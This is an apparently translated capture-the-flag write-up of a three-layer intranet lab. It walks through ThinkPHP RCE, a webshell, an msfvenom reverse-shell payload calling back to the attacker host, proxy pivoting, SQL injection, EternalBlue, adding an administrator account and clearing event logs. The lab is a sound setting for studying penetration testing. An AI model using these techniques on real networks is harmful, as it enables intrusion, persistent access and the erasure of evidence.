Table of contents
Shooting range introduction:
The three-layer intranet shooting range has three network segments, namely network segment 75 (public network segment), network segment 22 (intranet), and network segment 33 (intranet).
The shooting range consists of three servers: Target1, Target2, and Target3, and their systems are centos, Ubuntu, and Windows7. Target1 is equipped with VMnet4 and NAT network cards, Target2 is equipped with VMnet9 and VMnet10 network cards, and Target3 is only equipped with VMnet10 network card.
By building a three-layer intranet shooting range, the relationship between the external network server, intranet server and intranet office environment in the production environment is simulated.
Using kali equipped with a VMnet4 network card, the attacker simulated collecting information from the external network, obtained website information, exploited website vulnerabilities to seize the permissions of the external network server, and used the compromised external network server as a springboard to access the internal network server through a proxy. Then, through the loopholes in the intranet server website, we seize permissions again and establish a secondary proxy, then reach the intranet office environment, and finally use the loopholes in the host to obtain the penetration process of intranet host permissions.
Regarding the proxy, you can use the proxy tool that comes with msf or some other tools. The same principle remains the same. The next article will describe the use of the EarthWorm proxy tool. According to actual testing, this tool is more stable than the tool that comes with msf. , the host will not be disabled during scanning!
Range frame:
I borrowed the picture for use , I am too lazy to draw it, so I will change the IP address here.
kali:192.168.75.44
target1:192.168.75.132
192.168.22.130
target2:192.168.22.131
192.168.33.130
target3:192.168.33.131
Shooting range setup:
The web service must be enabled during initial configuration of the target machine:
centos:
root password: teamssix.comPagoda backend login address and password:
Address: http://target1ip:8888/a768f109/
Account: eaj3yhsl
Password: 41bb8feeIn the site configuration, fill in target1ip
ubuntu:
root password: teamssix.comPagoda background login address and password:
Address: http://target2ip:8888/2cc52ec0/
Account: xdynr37d
Password: 123qwe..windows 7:
Administrator password: teamssix.com
IP address of this host:192.168.33.131
Let’s take a look at the settings of the virtual machine network segment. Add 3 networks, vm4/vm9/vm10, and the network segments are as follows
Set the network segment of the Kali attack machine:
Set the network segment of Target1 :
Set the network segment of Target2:
Set the network segment of Target3:
Check the kali network segment and the settings are correct. 111 is the nat network segment, which is used for outgoing network.
Check the Target1 network segment and the settings are correct. 75 is the public network segment and 22 is the intranet segment.
Check the Target2 network segment and the settings are correct. 22 is the intranet segment and 33 is another intranet segment.
Check the Target3 network segment, the settings are correct, 33 is the intranet segment
Next, configure the web service of Target1
Add Target’s IP address and you’re done.
Target2's web service is the same!
At this point, the configuration of all target drones is complete, let’s start the penetration!
Penetration process:
Kali checks the IP address of the target machine, 192.168.75.132
Perform a port scan on it and find ports 21, 22, 80, 888, 3306, and 8888
Both 21 and 22 can be cracked by brute force, you can try it yourself! Here we access port 80 and find that the framework is ThinkPHP V5 and the version is 5.0. This version has an RCE vulnerability. We will use a small tool to conduct a wave of detection later!
First perform a wave of directory blasting to see if there are any sensitive files. Here we scan out robots.txt
Visit and find flag1
flag{QeaRqaw12fs}
Use this ThinkPHP gadget to check whether there are related vulnerabilities and find that RCE does exist.
Select the corresponding version of GetShell
Connected with Chinese Ant Sword and found flag2
flag{e2D3aFdasde}
Return the shell to msf and generate a remote control, reverse! Reverse means that I open a port here and let the victim actively connect to the port I opened after running our remote control. There is also forward operation behind.
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.75.44 lport=4455 -f elf>xiao.elf
Once generated, upload the file in Ant Sword and authorize it
Open msf locally in kali, set monitoring and payload, as well as the port, ip, etc. set in the remote control just now
After setting it up, execute it to connect to kali and get meterpreter!
Then execute the establishment of a shell, run the relevant commands to check the IP of the target machine currently captured, and found that it has dual network cards, and the other one is network segment 22. 
You can also use run get_local_subnets in meterpreter to get the network segment
and add the network segment to the route
Use msf's Auxiliary auxiliary detection module to set the proxy, set the port, etc.
Modify the proxy port locally, etc. vim /etc/proxychains4.conf
Then you can use the proxy to scan the host port of network segment 22 locally!
Here we found that many ports are open in network segment 22. We used curl to access port 80 and bounced its source code.
And found the hint! There is sql injection under this path!
First of all, if you want to access the web service on port 22, you have to set up a proxy in the browser. Fill in the proxy that will be set locally below and confirm it. Then you can access it.
Is a BageCMS framework
Explode its directory, view sensitive files, and find robots.txt
After visiting, I saw two paths!
Enter the URL and find the backend. I don’t know the login and password. It will say that there is a path to SQL injection, so just use SQL injection to reveal the username and password!
You can hand-note here, which is more stable. If you use that proxy, you may get stuck and have to reset again. The more stable one is to use ew as a proxy. I will talk about it in the next article. In fact, I am using ew to hang up the proxy here. , sqlmap is so smooth to use!
The database name is noted. The following is the daily operation, so I won’t go into details.
Finally got the username admin and password 123qwe
After logging in, I got the third flag!
After browsing around, I found that the php file can be modified in this template, so just write a sentence to get the webshell
At the same time, Ant Sword also needs to set up a proxy, and then you can connect to it.
Regarding this path, it is very simple. If you look at its structure, r= is accessing the module. If you directly access the tag here, you will directly access index.php.
After the connection is successful, network segment 33 is found in Ant Sword, then transfer the webshell to msf
The same operation, but the forward operation is required here. The forward operation is bind_tcp.
Forward proxy: To put it bluntly, the listening port is opened on the controlled server. A forward tunnel is formed through this port, which is accessed by the proxy host and connected by the proxy host. Note that the intranet entrance is generally in the DMZ zone and is blocked by a firewall. It cannot Directly enter the intranet environment!
Reverse proxy: The intranet host actively connects to the proxy machine, and then the attack machine connects to the proxy to form a reverse proxy. For example, a VPS is used to monitor a local port and the controlled intranet server is connected to this port to form a tunnel. .
Just make an understanding here, the same, upload, empower, execute
Use proxychains4 msfconsole to open msf. The previous msf cannot be closed and is still hanging. Open this new one to get the target2 shell.
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set LPORT 6666
RHOST set 192.168.22.131
The same operation is used to obtain the network segment in meterpreter, add routes, etc., directly as shown in the picture above!
Write the newly opened proxy port into proxychains4, and then open a new msf to obtain the shell of target3
First, scan the third target drone and find 445 and 139. Then Eternal Blue will strike.
First check whether it exists and set it up.
If you find that it may exist, go for it!
After setting up the exploit and payload, run directly
Great, I got meterpreter, ran the shell, and garbled characters appeared. I entered chcp 65001 to modify its encoding format, and the garbled characters were fixed.
There is no need to elevate the rights, just system. Check the open ports and find 3389, remote desktop connection, great!
Create a new user and send it to the administrators group
Open mstsc on Windows, enter your username, password and IP address to open remote desktop
Well, I don’t get anything, forget it, let’s change the administrator’s password and connect again!
OK!
The flag is on the table, and it smells good!
flag{2wAdK32Lsd}
The overall penetration is over. Finally, you can clearev the event log in meterpreter. Hehe, this is not necessary.
Summarize:
- First of all, when collecting information, we must gradually clarify the network topology of this target.
- Secondly, we must constantly think about the transition between goals, use the obtained goals as a springboard, and continue to penetrate deeply.
- Through this shooting range, my understanding of agents gradually deepened.
- Summarize and recall the pitfalls you have walked through during the entire penetration process. Only by doing it yourself can you encounter problems, think about them, solve them, and understand the problem. For example, when obtaining meterpreter, there are problems such as failure to rebound, session closing, and agent hanging.
- Finally, stay curious and keep doing it!
If you need gadgets during the penetration process, you can send me a private message! Hehe, helping others is the basis of happiness!